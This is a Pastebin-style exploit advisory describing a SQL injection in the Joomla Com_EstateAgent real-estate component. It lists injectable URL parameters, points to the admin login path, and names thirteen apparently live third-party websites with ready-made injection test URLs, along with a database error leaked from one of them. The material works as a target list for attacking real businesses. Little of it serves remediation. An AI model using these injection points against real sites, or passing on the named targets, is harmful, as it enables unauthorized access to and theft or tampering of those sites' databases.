KingSkrupellos

Joomla 1.5.26 Com_EstateAgent Components 3.x SQL Injection

Aug 23rd, 2019
104
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.76 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Joomla 1.5.26 Com_EstateAgent Components 3.x SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 24/08/2019
  7. # Vendor Homepage : joomla.org - eaimproved.eu
  8. # Software Download Link : extensions.joomla.org/extension/estate-agent-improved/
  9. # Affected Joomla Version : Joomla 1.0.12 - 1.0.15 - 1.5.18 - 1.5.26
  10. # Software Affected Version : Com_EstateAgent 3.x - 3.7
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  15. Special Elements used in an SQL Command ('SQL Injection') ]
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  19.  
  20. ###################################################################
  21.  
  22. # Impact :
  23. ***********
  24. Joomla 1.5.26 Com_EstateAgent Components 3.x is prone to an SQL-injection vulnerability
  25. because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  26. Exploiting this issue could allow an attacker to compromise the application, access or
  27. modify data, or exploit latent vulnerabilities in the underlying database.
  28. A remote attacker can send a specially crafted request to the vulnerable application and
  29. execute arbitrary SQL commands in application`s database. Further exploitation of this
  30. vulnerability may result in unauthorized data manipulation.
  31. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  32.  
  33. ###################################################################
  34.  
  35. # Admin Panel Login Path :
  36. *************************
  37. /administrator
  38.  
  39. # SQL Injection Exploit :
  40. **********************
  41. /index.php?option=com_estateagent&act=object&task=showEO&id=[SQL Injection]
  42.  
  43. /index.php?option=com_estateagent&Itemid=[ID-NUMBER]&act=object&task=showEO&id=[SQL Injection]
  44.  
  45. /index.php?option=com_estateagent&Itemid=[ID-NUMBER]&act=object&task=showEO&id=[SQL Injection]&lang=english
  46.  
  47. /index.php?option=com_estateagent&act=showCE&id=[ID-NUMBER]&Itemid=[SQL Injection]&limitstart=[SQL Injection]
  48.  
  49. /index.php?option=com_estateagent&act=showCE&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
  50.  
  51. /index.php?option=com_estateagent&act=showEASR&Itemid=[SQL Injection]&lang=el&font-size=larger
  52.  
  53. ###################################################################
  54.  
  55. # Example Vulnerable Sites :
  56. *************************
  57. [+] immobiliarepantaleo.it/web/index.php?option=com_estateagent&Itemid=1&act=object&task=showEO&id=1%27
  58.  
  59. [+] kritamos-estate.gr/index.php?option=com_estateagent&act=showEASR&Itemid=177&lang=el&font-size=larger
  60.  
  61. [+] realestatefasano.com/index.php?option=com_estateagent&Itemid=26&act=object&task=showEO&id=503%27&lang=english
  62.  
  63. [+] specinkom.ru/index.php?option=com_estateagent&Itemid=32&act=object&task=showEO&id=230%27
  64.  
  65. [+] alizziimmobiliare.it/catalogo/index.php?option=com_estateagent&Itemid=1&act=object&task=showEO&id=844%27
  66.  
  67. [+] casenelverde.com/index.php?option=com_estateagent&Itemid=99999999&act=object&task=showEO&id=928%27
  68.  
  69. [+] kvarc.com.ua/index.php?option=com_estateagent&Itemid=39&act=object&task=showEO&id=1267%27
  70.  
  71. [+] itranaimmobiliare.it/public/index.php?option=com_estateagent&Itemid=26&act=object&task=showEO&id=2%27
  72.  
  73. [+] stefanibg.com/index.php?option=com_estateagent&Itemid=26&act=object&task=showEO&id=391%27
  74.  
  75. [+] taman.su/index.php?option=com_estateagent&Itemid=36&act=object&task=showEO&id=210%27
  76.  
  77. [+] vizorsa.com/web/index.php?option=com_estateagent&Itemid=26&act=object&task=showEO&id=5%27
  78.  
  79. [+] an-status.ru/index.php?option=com_estateagent&Itemid=7&act=object&task=showEO&id=1012%27
  80.  
  81. [+] suzili.info/index.php?option=com_estateagent&Itemid=46&act=object&task=showEO&id=469%27&lang=ru
  82.  
  83. ###################################################################
  84.  
  85. # Example SQL Database Error :
  86. ****************************
  87. You have an error in your SQL syntax; check the manual that corresponds to your
  88. MySQL server version for the right syntax to use near \'AND d.published = 1 AND
  89. d.access<=0 AND c.name=\'EstateAgents\'\' at line 1 SQL=SELECT d.* FROM
  90. jos_contact_details AS d LEFT JOIN jos_categories AS c ON (d.catid = c.id)
  91. WHERE d.user_id = AND d.published = 1 AND d.access<=0 AND c.name=\'EstateAgents\'
  92. Warning: Invalid argument supplied for foreach() in /web/htdocs/www.immobiliarepantaleo.it
  93. /home/web/components/com_estateagent/templates/improved/obj.php on line 52
  94.  
  95. ###################################################################
  96.  
  97. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  98.  
  99. ###################################################################
Add Comment
Please, Sign In to add comment